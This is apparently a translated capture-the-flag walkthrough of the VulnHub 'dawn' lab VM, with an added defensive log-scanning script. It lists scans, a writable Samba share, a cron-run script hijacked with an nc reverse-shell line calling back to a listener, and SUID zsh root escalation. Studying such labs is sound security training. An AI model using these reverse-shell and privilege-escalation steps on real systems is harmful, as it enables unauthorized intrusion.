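Disclaimer
Most of the articles on this WeChat public account come from the author's day-to-day study notes; some are reposted with the author's permission or through other accounts' repost whitelists. Do not use the techniques described in these articles for illegal testing; the author and this account bear no responsibility for any adverse consequences that result.
Target VM download: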
https://download.vulnhub.com/sunset/dawn.zip
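Contents:
Host discovery
Port scanning
Information gathering
Samba vulnerability
Arbitrary file upload
Log information disclosure
Scheduled tasks
Password brute-forcing
Privilege escalation
1.1 Host discovery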
arp-scan -l
1.2 Port scanning
nmap -p- 192.168.144.138
1.3 Information gathering
nmap -p80,139,445,3306 -sV -A 192.168.144.138
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-02 02:37 EDT
Nmap scan report for 192.168.144.138
Host is up (0.0012s latency).
PORT STATE SERVICE VERSION
open http Apache httpd 2.4.38 ((Debian))
Apache/2.4.38 (Debian) :
Site doesn't have a title (text/html). :
open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
open mysql MySQL 5.5.5-10.3.15-MariaDB-1
mysql-info:
Protocol: 10
Version: 5.5.5-10.3.15-MariaDB-1
Thread ID: 14
Capabilities flags: 63486
Some Capabilities: Support41Auth, SupportsCompression, SupportsTransactions, ConnectWithDatabase, IgnoreSigpipes, FoundRows, ODBCClient, Speaks41ProtocolOld, DontAllowDatabaseTableColumn, LongColumnFlag, InteractiveClient, SupportsLoadDataLocal, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
Status: Autocommit
Salt: nZY0"VmCFt5L[hu7M^o6
Auth Plugin Name: mysql_native_password
MAC Address: 08:00:27:BE:C7:00 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: DAWN
Host script results:
mean: 1h20m00s, deviation: 2h18m33s, median: 0s :
smb-security-mode:
account_used: guest
authentication_level: user
challenge_response: supported
message_signing: disabled (dangerous, but default)
smb2-time:
date: 2022-11-02T06:37:55
start_date: N/A
NetBIOS name: DAWN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) :
smb2-security-mode:
3.1.1:
Message signing enabled but not required
smb-os-discovery:
OS: Windows 6.1 (Samba 4.9.5-Debian)
Computer name: dawn
NetBIOS computer name: DAWNx00
Domain name: dawn
FQDN: dawn.dawn
System time: 2022-11-02T02:37:55-04:00
TRACEROUTE
HOP RTT ADDRESS
1 1.21 ms 192.168.144.138
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.66 seconds
Ports 139 and 445 are open and running Samba smbd.
1.4 Samba vulnerability
smbclient -L \\192.168.144.138
smbclient \\192.168.144.138\ITDEPT
help
Files can be written to the share with put:
echo 1111 > a.txt
put a.txt
ls
Arbitrary files can be written.
1.5 Log file analysis
dirsearch -u http://192.168.144.138/
http://192.168.144.138/logs/
http://192.168.144.138/logs/management.log
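You may wonder why there are no logs. On this VM the logs are only collected between 10 and 11 at night. If there are no logs, take a day off and they will be there tomorrow. The same applies to gaining the foothold!
Download the log file and analyze it.
The pspy64 tool was used to capture the running services.
The web root is /var/www/html.
The key finding is ITDEPT: the same folder is exposed by the service on port 445, and the web-control script is executed from it.
The script is then given 777 permissions.
The script is run over and over in a loop, so a file named after the script can be written through the 445 service with reverse-shell code in it, and then it is a matter of waiting for the loop to execute it.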
grep "/home/dawn/ITDEPT/" management.log
Forge a product-control file, write reverse-shell code into it, and wait for the loop to execute it.
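Added example (not from the original article): a defender's view of the same log. It scans pspy-style process lines for scripts that are executed from the SMB-exported directory and that a chmod job made world-writable, which is the misconfiguration this section relies on. The log lines and the assumed pspy line format are constructed; the directory and script names are taken from the article.

```python
import re

# Assumed pspy line shape: "<date> <time> CMD: UID=<n> PID=<n> | <command line>"
PROC = re.compile(r"CMD: UID=(\d+)\s+PID=\d+\s+\| (.*)$")
CHMOD = re.compile(r"\bchmod\s+(?:-\S+\s+)*([0-7]{3,4})\s+(\S+)")

# Constructed sample lines (not the VM's real log); path and names from the article.
SAMPLE_LOG = """\
2022/11/02 22:01:01 CMD: UID=0    PID=1201   | /usr/sbin/cron -f
2022/11/02 22:01:01 CMD: UID=0    PID=1202   | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
2022/11/02 22:01:01 CMD: UID=1000 PID=1203   | /bin/sh -c /home/dawn/ITDEPT/product-control
2022/11/02 22:01:01 CMD: UID=33   PID=1204   | /bin/sh -c /home/dawn/ITDEPT/web-control
2022/11/02 22:02:01 CMD: UID=0    PID=1210   | /bin/sh -c chmod 644 /var/www/html/index.html
2022/11/02 22:02:01 CMD: UID=1000 PID=1211   | /bin/sh -c /home/dawn/ITDEPT/product-control
"""


def is_world_writable(mode):
    """True when an octal mode string such as '777' sets the other-write bit."""
    return (int(mode, 8) & 0o002) != 0


def find_risky_jobs(log_text, share_root="/home/dawn/ITDEPT/"):
    """Report scripts executed from share_root and whether a job loosened them."""
    loosened = set()   # paths a chmod made world-writable
    jobs = {}          # path -> {"uids": set of UIDs, "runs": execution count}
    for line in log_text.splitlines():
        match = PROC.search(line)
        if not match:
            continue
        uid, cmd = int(match.group(1)), match.group(2)
        chmod = CHMOD.search(cmd)
        if chmod:
            if is_world_writable(chmod.group(1)):
                loosened.add(chmod.group(2))
            continue   # a chmod of the path is not an execution of it
        for token in cmd.split():
            if token.startswith(share_root):
                job = jobs.setdefault(token, {"uids": set(), "runs": 0})
                job["uids"].add(uid)
                job["runs"] += 1
    return {path: dict(job, world_writable=path in loosened)
            for path, job in jobs.items()}


if __name__ == "__main__":
    for path, info in sorted(find_risky_jobs(SAMPLE_LOG).items()):
        flag = "WORLD-WRITABLE" if info["world_writable"] else "ok"
        print(f"{path} uids={sorted(info['uids'])} runs={info['runs']} {flag}")
```

A path reported with world_writable set, inside a share that guests can write to, is a scheduled job that belongs outside the share, owned by root and not writable by others.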
1.6 Gaining a foothold
smbclient \\192.168.144.138\ITDEPT
vim product-control // create the file
// write the nc reverse shell
nc -e /bin/sh 192.168.144.247 4444
put product-control // wait a moment
nc -lvnp 4444
Success!!!
python -c "import pty;pty.spawn('/bin/bash')" // upgrade the terminal
1.7 Privilege escalation (SUID)
find / -type f -perm -u=s -ls 2>/dev/null
This reveals a zsh that runs with root privileges, so the rest is simple: just run zsh.
Success
Originally published on the WeChat public account 嗨嗨安全: 靶机实战系列之dawn靶机